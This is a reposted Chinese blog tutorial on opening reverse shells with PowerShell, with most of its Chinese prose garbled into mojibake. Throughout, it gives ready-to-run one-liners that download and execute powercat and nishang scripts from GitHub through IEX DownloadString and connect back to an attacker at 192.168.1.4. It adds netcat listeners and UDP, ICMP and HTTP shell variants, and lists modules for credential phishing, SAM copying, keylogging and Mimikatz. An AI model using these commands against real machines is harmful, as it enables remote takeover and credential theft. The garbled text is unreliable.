[Shell]Powershell鍙嶅脊shell

Posted 2022-10-09

鏍囩锛?a href='http://www.mamicode.com/so/1/logger' title='logger'>logger   scene   璁剧疆   server   ima   閾炬帴   mamicode   

鍘熶綔鑰咃細Cream
鏂囩珷鍑哄锛?璐濆瀹夊叏瀹為獙瀹?/p>

0x01 Powershell鍙嶅脊shell

Windows PowerShell 鏄竴绉嶅懡浠よ澶栧３绋嬪簭鍜岃剼鏈幆澧冿紝浣垮懡浠よ鐢ㄦ埛鍜岃剼鏈紪鍐欒€呭彲浠ュ埄鐢?.NET Framework鐨勫己澶у姛鑳姐€傚畠寮曞叆浜嗚澶氶潪甯告湁鐢ㄧ殑鏂版蹇碉紝浠庤€岃繘涓€姝ユ墿灞曚簡鎮ㄥ湪 Windows 鍛戒护鎻愮ず绗﹀拰 Windows Script Host 鐜涓幏寰楃殑鐭ヨ瘑鍜屽垱寤虹殑鑴氭湰銆?/p>

涓€鏃︽敾鍑昏€呭彲浠ュ湪涓€鍙拌绠楁満涓婅繍琛屼唬鐮侊紝浠栦滑渚垮彲浠ヤ笅杞絧owershell鑴氭湰鏂囦欢锛?ps1锛夊埌纾佺洏鎵ц锛岃剼鏈彲浠ュ湪鍐呭瓨涓繍琛?鏃犳枃浠跺寲)銆傛垜浠彲浠ュ皢powershell鐪嬪仛鏄懡浠ゆ彁绀虹cmd.exe鐨勬墿灞曘€?/p>

鍚勪釜绯荤粺涓璓owershell鐨勭増鏈涓嬶細

鍙互鍦ㄨ緭鍏et-Host鎴栬€?PSVersionTable.PSVERSION鏉ユ煡鐪嬬増鏈俊鎭紝濡備笅鎵€绀猴細

2.1 powercat鍙嶅脊shell

powercathttps://github.com/besimorhino/powercat涓篜owershell鐗堢殑Netcat锛屽疄闄呬笂鏄竴涓猵owershell鐨勫嚱鏁帮紝浣跨敤鏂规硶绫讳技Netcat銆?/p>

鏀诲嚮鑰呯洃鍚細

nc 鈥搇vnp 9999 

鐩爣鏈哄弽寮笴MD锛?/p>

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd

鏀诲嚮鏈烘敹鍒扮洰鏍囨満鐨勫洖寮癸細

鑻ユ敾鍑绘満娌℃湁nc鐨勮瘽锛屽彲浠ュ厛涓嬭浇涓€涓猵owercat锛屼箣鍚庡啀杩涜鐩戝惉锛?/p>

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -l -p 9999

鏀诲嚮鏈烘敹鍒扮洰鏍囨満鐨勫洖寮癸細

2.2 nishang鍙嶅脊shell

Nishanghttps://github.com/samratashok/nishang鏄竴涓熀浜嶱owerShell鐨勬敾鍑绘鏋讹紝闆嗗悎浜嗕竴浜汸owerShell鏀诲嚮鑴氭湰鍜屾湁鏁堣浇鑽凤紝鍙弽寮筎CP/ UDP/ HTTP/HTTPS/ ICMP绛夌被鍨媠hell銆?/p>

Nishang瑕佸湪PowerShell3.0浠ヤ笂鐨勭幆澧冧笅鎵嶅彲浠ユ甯镐娇鐢紝鍦╳indow 7鎴栬€卻erver2008涓婂彲鑳戒細鍑虹幇涓€浜涘紓甯搞€?/p>

瀵煎叆Nishang妯″潡
Import-Module .\nishang.psm1
瀵煎叆鎴愬姛鍚庯紝浜х湅Nishang涓ā鍧?Get-Command 鈥揗odule nishang

Nishang鏀诲嚮妯″潡鏈夛紙鍙粙缁嶉儴鍒嗭級锛?/p>

Check-VM锛氭娴嬬洰鏍囨満鍣ㄦ槸鍚︿负铏氭嫙鏈?
Invoke-CredentialsPhish锛氭楠楃洰鏍囦富鏈虹敤鎴凤紝鐢ㄤ綔閽撻奔

Copy-VSS锛氬埄鐢╒olume Shaodow Copy澶嶅埗sam鏂囦欢

FireBuster FireLiStener锛氱敤浣滃唴缃戠幆澧冩壂鎻?
Keylogger锛氱敤浣滈敭鐩樿褰?
Invoke-Mimikatz锛氱被浼糓imikatz锛岀洿鎺ヨ幏鍙栫郴缁熻处鍙锋槑鏂囧瘑鐮?
Get-PassHashes锛氳幏鍙栫郴缁熷瘑鐮乭ash鍊?/code>

2.2.1 鍩轰簬TCP鐨凱owershell浜や簰寮弒hell

鍦ㄧ洰鏍囨満涓婃墽琛屽涓嬬殑浠ｇ爜锛?/p>

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.4 -port 9999

鍏朵腑锛孖nvoke-PowerShellTcp鏄熀浜嶵CP鍗忚鐨凱owershell姝ｅ悜杩炴帴鎴栬€呭弽鍚戣繛鎺hell锛屽叾鍙傛暟濡備笅锛?- IPAddress 鍙嶅悜杩炴帴鏃惰缃殑IP
- Port 姝ｅ悜杩炴帴鏃惰缃殑绔彛锛屽墠闈㈣鍐欎笂-Bind鍙傛暟
- Reverse  鍙嶅悜杩炴帴
- Bind 姝ｅ悜杩炴帴

鍙嶅悜杩炴帴锛欼nvoke-PowerShellTcp -Reverse -IPAddress 192.168.1.4 -port 9999

2.2.2 鍩轰簬UDP鐨凱owershell浜や簰寮弒hell

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.1.4 -port 5399

鍦ㄦ敾鍑昏€呯殑鐢佃剳涓婃墽琛屽涓嬬殑鍛戒护锛?/p>

nc -lup 6005 

涓婅堪娴嬭瘯鏄弽鍚戣繛鎺ワ紝閭ｄ箞姝ｅ悜杩炴帴鐨勬椂鍊欙紝鍦ㄦ敾鍑昏€呯殑鐢佃剳涓婅繍琛岀殑鍛戒护涓猴細

nc -nvu 192.168.1.24 4555

2.2.3 鍩轰簬ICMP鐨凱oershell浜や簰寮廠hell

闇€瑕佸€熷姪浜巌cmpsh_m.py鏂囦欢锛屽叾鐢ㄦ硶濡備笅锛?/p>

./icmpsh-m.py <source IP address> <destination IP address>

鍦ㄨ鏀诲嚮鐨勬満鍣ㄤ笂鎵ц锛?/p>

Invoke-PowerShellIcmp -IPAddress <source IP address>

2.2.4 鍩轰簬HTTP/HTTPS鐨凱oershell浜や簰寮廠hell

HTTP: Invoke-PoshRatHttp 鈥揑PAddess 192.168.1.4 鈥揚ort 4444
HTTPS: Invoke-PoshRatHttps  鈥揑PAddess 192.168.1.4 鈥揚ort 4444
鐒跺悗浼氱敓鎴愪竴涓猵owershell濡備笅鐨勫懡浠ぢ仿仿仿稩EX  ((New-Object Net.WebClient).DownloadString(鈥榟ttp://192.168.1.4:4444/connect鈥?)
鐒跺悗澶嶅埗璇ュ懡浠ゅ湪琚敾鍑绘満鍣ㄤ笂鎵ц鍗冲彲锛屼究鍙湅鍒板弽寮圭殑shell

鍙嶅脊shell鐨勫涔犳€荤粨

以上是关于[Shell]Powershell鍙嶅脊shell的主要内容，如果未能解决你的问题，请参考以下文章

内网渗透之Windows反弹shell

渗透攻击PowerShell与Shell 有什么区别详解用法及安全

渗透攻击PowerShell与Shell 有什么区别详解用法及安全

运行 PowerShell 脚本后如何保持 shell 窗口打开？

从命令提示符或 PowerShell 调用 MSYS2 Shell

2 Powershell与Cmd以及Unix/Linux Shell